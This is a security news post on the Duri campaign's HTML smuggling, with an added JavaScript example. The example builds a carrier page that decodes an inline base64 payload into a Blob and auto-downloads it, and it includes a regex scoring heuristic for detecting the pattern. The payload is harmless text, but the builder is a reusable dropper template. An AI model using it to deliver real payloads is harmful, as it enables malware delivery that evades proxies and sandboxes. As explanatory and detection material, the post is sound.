Duri campaign smuggles malware via HTML and JavaScript

silversurfer

A new attack campaign uses a combination of HTML smuggling techniques and data blobs to evade detection and download malware.

Dubbed Duri, the campaign exploits the JavaScript blob method which generates the malicious file in the web browser, thus avoiding detection by sandboxes and proxies.

"Traditional network security solutions such as proxies, firewalls, and sandboxes rely on the transfer of objects over the wire. For example, a sandbox might extract file objects such as .exe, .zip, and other suspicious objects from the wire and then send them to the sandbox for detonation," reads a report published by Menlo Security.
The company's detailed analysis of the Duri campaign, along with the Zero Trust detection approach used and a long list of Indicators of Compromise (IoCs) related to the campaign, is provided in their report.
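To make the "file is generated in the browser" point concrete, here is an added example (not code from the original post, from the Duri campaign, or from the Menlo Security report). It uses a constructed, harmless text payload: the page carries the file only as base64 inside its script, decodes it with atob(), assembles it into a Blob, and triggers the download through an object URL, so a proxy or sandbox that extracts .exe/.zip objects from the wire only ever sees text/html. The second half is a simple static check on the page source for the same building blocks; the indicator list, the function names and the score threshold are this example's own assumptions, not a product's detection logic.

```javascript
// Added example: HTML smuggling via JavaScript Blob, with a benign payload,
// plus a static source check for the pattern. Not from the original post.

// Constructed benign payload: a plain text file. A real campaign would put
// the malware (typically an archive or executable) in this base64 string.
const PAYLOAD_NAME = "invoice.txt";
const PAYLOAD_TEXT = "This is a harmless stand-in for a smuggled file.\n";
const PAYLOAD_B64 = btoa(PAYLOAD_TEXT);

// base64 -> bytes using atob(), available in browsers and in Node.
function decodePayload(b64) {
  const bin = atob(b64);
  const bytes = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
  return bytes;
}

// The smuggling step: the file is assembled client-side as a Blob.
function buildBlob(b64, mime) {
  return new Blob([decodePayload(b64)], { type: mime });
}

// Browser-only: expose the Blob as an object URL and auto-click a download link.
function dropInBrowser(b64, filename, mime) {
  const url = URL.createObjectURL(buildBlob(b64, mime));
  const a = document.createElement("a");
  a.href = url;
  a.download = filename;
  document.body.appendChild(a);
  a.click();
  a.remove();
  URL.revokeObjectURL(url);
}

// The carrier page a victim would receive: on the wire it is only text/html,
// so a filter that extracts file objects from the stream has nothing to detonate.
function buildCarrierPage(b64, filename, mime) {
  return `<!doctype html><html><body>
<script>
${decodePayload.toString()}
${buildBlob.toString()}
${dropInBrowser.toString()}
dropInBrowser(${JSON.stringify(b64)}, ${JSON.stringify(filename)}, ${JSON.stringify(mime)});
</script>
</body></html>`;
}

// Detection side (assumed heuristic for this example): since nothing is
// extractable from the wire, inspect the HTML/JS text for the technique's parts.
const SMUGGLING_INDICATORS = [
  /\batob\s*\(/,               // base64 decode of an inline payload
  /new\s+Blob\s*\(/,           // file assembled in the browser
  /URL\.createObjectURL\s*\(/, // blob turned into a downloadable URL
  /\.download\s*=/,            // anchor download attribute set from script
  /\.click\s*\(\s*\)/,         // download triggered without user action
  /msSaveOrOpenBlob/,          // legacy IE/Edge equivalent of the object URL
];

function smugglingScore(source) {
  return SMUGGLING_INDICATORS.filter((re) => re.test(source)).length;
}

// Threshold is an assumption: several indicators together are far more
// specific than any one of them (atob() alone is common in benign pages).
function looksLikeSmuggling(source) {
  return smugglingScore(source) >= 3;
}

if (typeof document !== "undefined") {
  // In a browser this performs the drop of the harmless file.
  dropInBrowser(PAYLOAD_B64, PAYLOAD_NAME, "text/plain");
} else {
  // In Node, just build the carrier page and run the static check over it.
  const page = buildCarrierPage(PAYLOAD_B64, PAYLOAD_NAME, "application/octet-stream");
  console.log(`carrier page: ${page.length} bytes, score ${smugglingScore(page)}, flagged=${looksLikeSmuggling(page)}`);
}
```

Opened in a browser, the generated page saves invoice.txt without any separate file transfer appearing on the network; run under Node it prints the indicator score for that same page (5 of the 6 indicators match), while an ordinary page with no script scores 0. A regex score like this is a starting point for a proxy or mail-gateway rule, not a substitute for executing the page in a browser-based sandbox, which is the approach the report describes.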